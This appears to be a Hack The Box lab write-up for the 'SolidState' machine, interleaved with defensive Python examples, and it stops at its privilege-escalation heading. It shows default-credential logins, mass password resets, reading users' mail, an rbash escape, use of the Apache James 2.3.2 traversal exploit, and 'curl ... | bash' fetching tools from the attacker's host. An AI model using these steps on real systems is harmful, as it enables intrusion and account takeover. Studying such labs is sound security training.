Solidstate

Solidstate01.png

Port scans

u505@kali:~/HTB/Machines/SolidState$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.51
[sudo] password for u505:

Starting masscan 1.0.5 at 2020-05-14 02:58:48 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.51
Discovered open port 110/tcp on 10.10.10.51
Discovered open port 4555/tcp on 10.10.10.51
Discovered open port 80/tcp on 10.10.10.51
Discovered open port 25/tcp on 10.10.10.51
Discovered open port 119/tcp on 10.10.10.51
u505@kali:~/HTB/Machines/SolidState$ nmap -sC -sV 10.10.10.51
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-13 20:08 EDT
Nmap scan report for solidstate.htb (10.10.10.51)
Host is up (0.049s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp  open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello solidstate.htb (10.10.14.28 [10.10.14.28]),
80/tcp  open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open  pop3    JAMES pop3d 2.3.2
119/tcp open  nntp    JAMES nntpd (posting ok)
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.06 seconds

We run nmap against port 4555, which masscan discovered and which is not among nmap's default ports.

u505@kali:~/HTB/Machines/SolidState$ nmap -sC -sV -p 4555 10.10.10.51
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-13 20:10 EDT
Nmap scan report for solidstate.htb (10.10.10.51)
Host is up (0.051s latency).

PORT     STATE SERVICE     VERSION
4555/tcp open  james-admin JAMES Remote Admin 2.3.2

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.69 seconds

Web Server (Port 80)

Solidstate02.png

u505@kali:~/HTB/Machines/SolidState$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,html" -r 1 -f -t 1000 -u http://10.10.10.51

_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, html | HTTP method: get | Threads: 1000 | Wordlist size: 13784 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-05-13_23-12-05.log
Target: http://10.10.10.51
[23:12:05] Starting:
[23:12:07] 403 - 291B - /.html
[23:12:07] 200 - 7KB - /about.html
[23:12:08] 200 - 1KB - /assets/
[23:12:19] 403 - 292B - /icons/
[23:12:19] 200 - 2KB - /images/
[23:12:19] 200 - 8KB - /index.html
[23:12:21] 200 - 17KB - /LICENSE.txt
[23:12:28] 200 - 963B - /README.txt
[23:12:30] 403 - 300B - /server-status/
[23:12:30] 200 - 8KB - /services.html
[23:12:34] Starting: assets/
[23:12:36] 403 - 298B - /assets/.html
[23:12:40] 200 - 2KB - /assets/css/
[23:12:43] 200 - 2KB - /assets/fonts/
[23:12:46] 200 - 2KB - /assets/js/
[23:13:00] Starting: icons/
[23:13:00] 403 - 297B - /icons/.html
[23:13:15] 200 - 35KB - /icons/README.html
[23:13:17] 403 - 298B - /icons/small/
[23:13:19] Starting: images/
[23:13:21] 403 - 298B - /images/.html
[23:13:40] Starting: server-status/
Task Completed

Dirsearch doesn't find anything relevant.

Apache James

James Remote Administration tool (port 4555) - user enumeration

u505@kali:~/HTB/Machines/SolidState$ nc solidstate 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin
adduser u505 u505
User u505 added

The default credentials (root/root) work. There are 5 existing accounts.

James smtp (port 25)

u505@kali:~/HTB/Machines/SolidState$ telnet 10.10.10.51 25
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Wed, 13 May 2020 20:39:10 -0400 (EDT)
EHLO solidstate
250-solidstate Hello solidstate (10.10.14.28 [10.10.14.28])
250-PIPELINING
250 ENHANCEDSTATUSCODES
AUTH LOGIN
334 VXNlcm5hbWU6

We decode the base64 payload of the 334 reply.

u505@kali:~/HTB/Machines/SolidState$ echo -n "VXNlcm5hbWU6" | base64 -d
Username:

The server asks for the username.

u505@kali:~/HTB/Machines/SolidState$ echo -n "u505" | base64
dTUwNQ==

We answer with the base64-encoded username u505.

dTUwNQ==
334 UGFzc3dvcmQ6

The server asks for the password, which we also send base64-encoded.

u505@kali:~/HTB/Machines/SolidState$ echo -n "UGFzc3dvcmQ6" | base64 -d
Password:
dTUwNQ==
235 Authentication Successful
MAIL FROM: <u505@gmail.com>
250 2.1.0 Sender <u505@gmail.com> OK
RCPT TO: <james>
250 2.1.5 Recipient <james@localhost> OK
DATA
354 Ok Send data ending with <CRLF>.<CRLF>
Subject: Test

This a test
.
250 2.6.0 Message received
quit
221 2.0.0 solidstate Service closing transmission channel
Connection closed by foreign host.

We send a message from the user we created earlier, but we gather no new information from it.
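As an added example (not part of the original write-up), the following Python script replays the AUTH LOGIN exchange above from a constructed copy of the transcript and decodes it. It makes the defensive point explicit: the 334 challenges and the client replies are only base64, not encryption, and the EHLO response above advertises no STARTTLS, so anyone who captures this session reads the password as easily as this script does. The SAMPLE_TRANSCRIPT list and the function names are assumptions made for the example.

```python
import base64

# Constructed copy of the session shown above, as (direction, line) pairs:
# "S" for a server reply, "C" for what the client typed.
SAMPLE_TRANSCRIPT = [
    ("S", "220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready"),
    ("C", "EHLO solidstate"),
    ("S", "250-solidstate Hello solidstate (10.10.14.28 [10.10.14.28])"),
    ("S", "250-PIPELINING"),
    ("S", "250 ENHANCEDSTATUSCODES"),
    ("C", "AUTH LOGIN"),
    ("S", "334 VXNlcm5hbWU6"),
    ("C", "dTUwNQ=="),
    ("S", "334 UGFzc3dvcmQ6"),
    ("C", "dTUwNQ=="),
    ("S", "235 Authentication Successful"),
]


def b64_text(token):
    """Decode one base64 token to text. Base64 is an encoding, not encryption:
    anything that sees the bytes on the wire can reverse it exactly like this."""
    return base64.b64decode(token, validate=True).decode("utf-8", errors="replace")


def advertises_starttls(transcript):
    """True when any 250-/250 line of the EHLO response lists STARTTLS.
    Without it the server gives the client no way to protect the login."""
    return any(
        d == "S" and line[:4] in ("250-", "250 ") and "STARTTLS" in line.upper()
        for d, line in transcript
    )


def decode_auth_login(transcript):
    """Recover the AUTH LOGIN dialogue from a plaintext transcript.

    Returns the decoded server prompts, the decoded client answers and
    whether the server accepted them (a 235 reply)."""
    result = {"prompts": [], "answers": [], "authenticated": False}
    in_auth = False
    for direction, line in transcript:
        if direction == "C" and line.strip().upper() == "AUTH LOGIN":
            in_auth = True
            continue
        if not in_auth:
            continue
        if direction == "S" and line.startswith("334 "):
            result["prompts"].append(b64_text(line[4:].strip()))
        elif direction == "C":
            result["answers"].append(b64_text(line.strip()))
        elif direction == "S" and line.startswith("235"):
            result["authenticated"] = True
            in_auth = False
        elif direction == "S" and line[:1] in ("4", "5"):
            in_auth = False  # rejected or deferred; stop collecting answers
    return result


if __name__ == "__main__":
    print(decode_auth_login(SAMPLE_TRANSCRIPT))
    print("server offers STARTTLS:", advertises_starttls(SAMPLE_TRANSCRIPT))
```

The same decoder works on a capture of a real session (for instance the lines of a TCP stream reassembled from a pcap), which is exactly why plaintext AUTH LOGIN on port 25 is a finding on its own.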

James Remote Administration tool - Change users' passwords

We reconnect to the remote administration tool and reset the users' passwords.

u505@kali:~/HTB/Machines/SolidState$ nc solidstate 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
listusers
Existing accounts 6
user: james
user: thomas
user: john
user: mindy
user: u505
user: mailadmin
setpassword james james
Password for james reset
setpassword thomas thomas
Password for thomas reset
setpassword john john
Password for john reset
setpassword mindy mindy
Password for mindy reset
setpassword mailadmin mailadmin
Password for mailadmin reset

James Pop3 (port 110) - Read users' emails

We changed the users' passwords in the previous step, so now we can read their emails.

u505@kali:~/HTB/Machines/SolidState$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER james
+OK
PASS james
+OK Welcome james
LIST
+OK 1 541
1 541
.
RETR 1
+OK Message follows
Return-Path: <u505@gmail.com>
Message-ID: <26717672.1.1589417021199.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-UserIsAuth: true
Delivered-To: james@localhost
Received: from 10.10.14.28 ([10.10.14.28])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 29
          for <james@localhost>;
          Wed, 13 May 2020 20:43:39 -0400 (EDT)
Date: Wed, 13 May 2020 20:43:39 -0400 (EDT)
From: u505@gmail.com
Subject: Test

This a test
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

This is the test email we sent earlier.

u505@kali:~/HTB/Machines/SolidState$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER thomas
+OK
PASS thomas
+OK Welcome thomas
LIST
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

Nothing here.

u505@kali:~/HTB/Machines/SolidState$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER john
+OK
PASS john
+OK Welcome john
LIST
+OK 1 743
1 743
.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <john@localhost>;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John,

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.
Thank you in advance.
Respectfully, James
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

This one is more interesting.

u505@kali:~/HTB/Machines/SolidState$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER mindy
+OK
PASS mindy
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy, Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.
We are looking forward to you joining our team and your success at Solid State Security.
Respectfully, James
.
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,

Here are your ssh credentials to access the system. Remember to reset your password after your first login. Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.
username: mindy pass: P@55W0rd1!2@
Respectfully, James
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

We obtain Mindy's password.

u505@kali:~/HTB/Machines/SolidState$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER mailadmin
+OK
PASS mailadmin
+OK Welcome mailadmin
LIST
+OK 0 0
.
quit
+OK Apache James POP3 Server signing off.
Connection closed by foreign host.

User flag

u505@kali:~/HTB/Machines/SolidState$ ssh mindy@solidstate.htb
mindy@solidstate.htb's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
mindy@solidstate:~$ cat user.txt
<USER_FLAG>

We get the user flag, but the shell is restricted.

mindy@solidstate:~$ cd /
-rbash: cd: restricted
mindy@solidstate:~$ bash
-rbash: bash: command not found
mindy@solidstate:~$ /bin/bash
-rbash: /bin/bash: restricted: cannot specify `/' in command names
mindy@solidstate:~$ ls -l
total 8
drwxr-x--- 2 mindy mindy 4096 Aug 22  2017 bin
-rw------- 1 mindy mindy   33 Sep  8  2017 user.txt
mindy@solidstate:~$ echo $PATH
/home/mindy/bin
mindy@solidstate:~$ ls -l bin
total 0
lrwxrwxrwx 1 root root 8 Aug 22  2017 cat -> /bin/cat
lrwxrwxrwx 1 root root 8 Aug 22  2017 env -> /bin/env
lrwxrwxrwx 1 root root 7 Aug 22  2017 ls -> /bin/ls

This shell is restricted to these 3 commands: cat, env and ls.

mindy@solidstate:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
james:x:1000:1000:james:/home/james/:/bin/bash
mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash

Bypass the restricted shell

Changing the pseudo terminal

u505@kali:~/HTB/Machines/SolidState$ ssh mindy@solidstate.htb -t "/bin/bash"
mindy@solidstate.htb's password:
rbash: /bin/bash: restricted: cannot specify `/' in command names
Connection to solidstate.htb closed.

rbash is invoked and refuses to execute /bin/bash, because a restricted shell doesn't allow a slash in command names.

u505@kali:~/HTB/Machines/SolidState$ ssh mindy@solidstate.htb -t bash
mindy@solidstate.htb's password:
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/games

After a few tests, it seems that the command given with -t runs before the login profile is loaded, so PATH has not yet been restricted to /home/mindy/bin and bash is found in the default PATH.

Alternative - exploit 35513 (Apache James Server 2.3.2 - Remote Command Execution)

u505@kali:~/HTB/Machines/SolidState$ searchsploit james 2.3.2
------------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                          |  Path
                                                                        | (/usr/share/exploitdb/)
------------------------------------------------------------------------ ----------------------------------------
Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write | exploits/linux/remote/48130.rb
Apache James Server 2.3.2 - Remote Command Execution                    | exploits/linux/remote/35513.py
------------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result
----------------------------------------------------------------- -----------------------------------------------
 Paper Title                                                     |  Path
                                                                 | (/usr/share/exploitdb-papers/)
----------------------------------------------------------------- -----------------------------------------------
Exploiting Apache James Server 2.3.2                             | docs/english/40123-exploiting-apache-james-ser
----------------------------------------------------------------- -----------------------------------------------
u505@kali:~/HTB/Machines/SolidState$ searchsploit -m 35513
  Exploit: Apache James Server 2.3.2 - Remote Command Execution
      URL: https://www.exploit-db.com/exploits/35513
     Path: /usr/share/exploitdb/exploits/linux/remote/35513.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /home/u505/HTB/Machines/SolidState/35513.py
u505@kali:~/HTB/Machines/SolidState$ dos2unix 35513.py
dos2unix: converting file 35513.py to Unix format...

This exploit logs in to the JAMES Remote Administration Tool (credentials are needed) and creates a user named ../../../../../../../../etc/bash_completion.d. It then sends a mail to that user containing a payload. The SMTP server stores each mail as a new file in the user's folder, creating the folder if it doesn't exist. Because of the directory traversal in the user name, the payload ends up as a file in /etc/bash_completion.d, and the contents of that folder are sourced at every user login.
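To make the bug class concrete, here is an added Python example (my own illustration, not code from the exploit or from Apache James) of how an unvalidated user name turns into a directory outside the mail repository, next to the validation a server should perform before using the name as a path. The repository root /srv/james/users, the exception class and the function names are assumptions; the page shows the mail files landing directly in /etc/bash_completion.d, so the model joins the root and the user name with nothing in between. The hardened version goes beyond this one case: it rejects any name that could escape, not just the one the exploit uses.

```python
import os

# Assumed repository root for the example. James keeps each user's mail in a
# folder named after the user, which is what the traversal above relies on.
REPO_ROOT = "/srv/james/users"

# Everything a mailbox name legitimately needs; note the absence of "/".
ALLOWED_CHARS = frozenset(
    "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._-"
)


class InvalidUsername(ValueError):
    """Raised by the hardened resolver for any name it refuses to store."""


def mailbox_dir_vulnerable(repo_root, username):
    """The vulnerable shape: the user name is glued onto the repository path
    with no validation, so '..' segments walk straight out of it."""
    return os.path.normpath(os.path.join(repo_root, username))


def mailbox_dir_hardened(repo_root, username):
    """Two independent defences. First, accept only characters a mailbox name
    needs, which rules out '/' and therefore any traversal. Second, resolve
    the final path and confirm it still lies under the repository root, which
    also catches a symlink planted inside the root by some other means."""
    if not username or username in (".", "..") or not set(username) <= ALLOWED_CHARS:
        raise InvalidUsername("rejected user name %r" % username)
    root = os.path.realpath(repo_root)
    target = os.path.realpath(os.path.join(root, username))
    if os.path.commonpath([root, target]) != root:
        raise InvalidUsername("user name %r resolves outside %s" % (username, root))
    return target


def is_acceptable_username(repo_root, username):
    """Boolean wrapper around the hardened check, convenient for input filtering
    at the point where 'adduser' input is received."""
    try:
        mailbox_dir_hardened(repo_root, username)
        return True
    except InvalidUsername:
        return False


if __name__ == "__main__":
    traversal = "../../../../../../../../etc/bash_completion.d"
    print("vulnerable resolves to:", mailbox_dir_vulnerable(REPO_ROOT, traversal))
    print("hardened accepts 'mindy':", is_acceptable_username(REPO_ROOT, "mindy"))
    print("hardened accepts traversal:", is_acceptable_username(REPO_ROOT, traversal))
```

The character whitelist is the check that actually closes the hole; the realpath comparison is defence in depth, because a name that passes the whitelist cannot contain a separator, but the directory it names could still be a symlink.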

u505@kali:~/HTB/Machines/SolidState$ grep -v "^#" 35513.py | head

import socket
import sys
import time

payload = '/bin/bash'
user = 'root'
pwd = 'root'
if len(sys.argv) != 2:

We update the file with our payload. The payload simply starts /bin/bash while rbash is still reading its startup files, before the restrictions apply.

u505@kali:~/HTB/Machines/SolidState$ ./35513.py 10.10.10.51
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.

Now if we log in as mindy, we first see the errors caused by the mail headers being interpreted as shell commands, but then /bin/bash is executed and the system gives us a full shell.

u505@kali:~/HTB/Machines/SolidState$ ssh mindy@solidstate.htb
mindy@solidstate.htb's password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
Last login: Thu May 14 17:00:26 2020 from 10.10.14.28
-rbash: $'\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003': command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L errorMessagetLjava/lang/String: No such file or directory
-rbash: L lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $'L\004nameq~\002L': command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $'remoteAddrq~\002L': command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $'\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp': command not found
-rbash: $'L\005stateq~\002xpsr\035org.apache.mailet.MailAddress': command not found
-rbash: @team.pl>
Message-ID: <19837922.0.1589489971093.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.14.28 ([10.10.14.28])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 73
          for <../../../../../../../../etc/bash_completion.d@localhost>;
          Thu, 14 May 2020 16:59:30 -0400 (EDT)
Date: Thu, 14 May 2020 16:59:30 -0400 (EDT)
From: team@team.pl

: No such file or directory
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -l /etc/bash_completion.d/
total 24
-rw-r--r-- 1 root root   736 May 14 16:59 4D61696C313538393438393937313037322D30.Repository.FileObjectStore
-rw-r--r-- 1 root root   573 May 14 16:59 4D61696C313538393438393937313037322D30.Repository.FileStreamStore
-rw-r--r-- 1 root root   439 Aug  9  2017 git-prompt
-rw-r--r-- 1 root root 11144 Feb 11  2017 grub
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat /etc/bash_completion.d/4D61696C313538393438393937313037322D30.Repository.FileStreamStore
Return-Path: <'@team.pl>
Message-ID: <19837922.0.1589489971093.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.14.28 ([10.10.14.28])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 73
          for <../../../../../../../../etc/bash_completion.d@localhost>;
          Thu, 14 May 2020 16:59:30 -0400 (EDT)
Date: Thu, 14 May 2020 16:59:30 -0400 (EDT)
From: team@team.pl

'
/bin/bash
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ exit
exit
-rbash: $'\r': command not found
mindy@solidstate:~$ echo $PATH
/home/mindy/bin
mindy@solidstate:~$ exit
logout
Connection to solidstate.htb closed.

We can see the "email" being executed during login. Once we exit /bin/bash, the login process continues and drops us into the restricted shell.

Enumeration

LinEnum.sh

We serve the LinEnum.sh script from a web server on our machine.

u505@kali:~/HTB/Machines/SolidState$ mkdir www
u505@kali:~/HTB/Machines/SolidState$ cd www/
u505@kali:~/HTB/Machines/SolidState/www$ cp /opt/utils/LinEnum/LinEnum.sh ./
u505@kali:~/HTB/Machines/SolidState/www$ sudo python -m SimpleHTTPServer 80
[sudo] password for u505:
Serving HTTP on 0.0.0.0 port 80 ...

And we execute it.

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ curl http://10.10.14.28/LinEnum.sh | bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 46642  100 46642    0     0   180k      0 --:--:-- --:--:-- --:--:--  180k
...
[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root             pts/0    10.10.14.2       Sat Dec 23 19:21:34 -0500 2017
mindy            pts/0    10.10.14.28      Wed May 13 21:45:04 -0400 2020
...
uid=1000(james) gid=1000(osboxes) groups=1000(osboxes),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(bluetooth),114(lpadmin),116(scanner)
...
james:x:1000:1000:james:/home/james/:/bin/bash
mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash
...
[-] Files not owned by user but writable by group:
-rwxrwxrwx 1 root root 105 Aug 22  2017 /opt/tmp.py
...
[-] Root is allowed to login via SSH:
PermitRootLogin yes
...

We take a look at the file tmp.py.

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ file /opt/tmp.py
/opt/tmp.py: Python script, ASCII text executable
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()

${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls -l /opt/tmp.py
-rwxrwxrwx 1 root root 105 Aug 22  2017 /opt/tmp.py

Pspy

We copy pspy to our web server.

u505@kali:~/HTB/Machines/SolidState/www$ cp /opt/utils/pspy/pspy32 ./
u505@kali:~/HTB/Machines/SolidState/www$ sudo python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...

We download and execute it on the target.

${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ wget http://10.10.14.28/pspy32
--2020-05-13 21:57:16--  http://10.10.14.28/pspy32
Connecting to 10.10.14.28:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2656352 (2.5M) [application/octet-stream]
Saving to: ‘pspy32’

pspy32 100%[===================>] 2.53M 2.35MB/s in 1.1s
2020-05-13 21:57:17 (2.35 MB/s) - ‘pspy32’ saved [2656352/2656352]
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ chmod +x pspy32
${debian_chroot:+($debian_chroot)}mindy@solidstate:/tmp$ ./pspy32
...
2020/05/13 22:03:01 CMD: UID=0 PID=1945 | /bin/sh -c python /opt/tmp.py
2020/05/13 22:03:01 CMD: UID=0 PID=1946 | python /opt/tmp.py
2020/05/13 22:03:01 CMD: UID=0 PID=1947 | sh -c rm -r /tmp/*

As expected, after a few minutes the script tmp.py is executed as root.
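The condition that makes this a privilege escalation is a root cron job running a script that anyone on the box can edit. The following added Python audit (not part of the original write-up) parses system-crontab lines, finds the absolute paths each command uses and flags any file that group or other users can write, or that sits in a directory where they can replace it. The crontab line modelled on the pspy output, the schedule, the fixture files and the function names are all constructed for the example; the real schedule on the box is not shown on this page.

```python
import os
import shutil
import stat
import tempfile


def writable_by_others(path):
    """True when the group or other permission bits allow writing the file."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def replaceable_in_dir(path):
    """True when unprivileged users can rename or unlink entries in the file's
    directory (directory writable by group/other and no sticky bit), which
    lets them swap the script even if the file itself is protected."""
    mode = os.stat(os.path.dirname(path) or ".").st_mode
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH)) and not mode & stat.S_ISVTX


def audit_cron_line(line):
    """Inspect one system-crontab line (the form with a user field, e.g.
    '*/3 * * * * root python /opt/tmp.py') and return (path, problem) tuples
    for every absolute path in the command that a lower-privileged user could
    tamper with before the cron user executes it."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return []
    fields = stripped.split(None, 6)
    if len(fields) < 7:
        return []  # not a schedule line (e.g. SHELL=... or PATH=...)
    user, command = fields[5], fields[6]
    findings = []
    for token in command.split():
        path = token.lstrip("<>")  # handle redirections such as >/var/log/x
        if not path.startswith("/") or not os.path.isfile(path):
            continue
        if writable_by_others(path):
            findings.append((path, "file writable by group/other, executed as %s" % user))
        if replaceable_in_dir(path):
            findings.append((path, "directory allows replacing the file, executed as %s" % user))
    return findings


def audit_crontab(text):
    """Run audit_cron_line over a whole crontab and collect the findings."""
    findings = []
    for line in text.splitlines():
        findings.extend(audit_cron_line(line))
    return findings


def build_fixture():
    """Constructed reproduction of the state found on the box: a root cron job
    running a mode-0777 script, next to a correctly protected one."""
    base = tempfile.mkdtemp(prefix="cron-audit-")
    os.chmod(base, 0o755)
    bad = os.path.join(base, "tmp.py")
    good = os.path.join(base, "cleanup.py")
    for p in (bad, good):
        with open(p, "w") as fh:
            fh.write("#!/usr/bin/env python\nimport os\nos.system('rm -r /tmp/* ')\n")
    os.chmod(bad, 0o777)
    os.chmod(good, 0o755)
    crontab = (
        "SHELL=/bin/sh\n"
        "# constructed example, modelled on the pspy output above\n"
        "*/3 * * * * root python %s\n"
        "*/3 * * * * root python %s >/dev/null 2>&1\n" % (bad, good)
    )
    return base, crontab


def demo():
    """Build the fixture, audit it and return findings with paths relative to
    the fixture directory so the result is reproducible."""
    base, crontab = build_fixture()
    try:
        return [(os.path.relpath(p, base), why) for p, why in audit_crontab(crontab)]
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    for path, problem in demo():
        print(path, "-", problem)
```

Pointing audit_crontab at the contents of /etc/crontab and the files under /etc/cron.d gives the same check on a live system; the interesting lines are those where the user field is root and a finding comes back.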

Privilege escalation

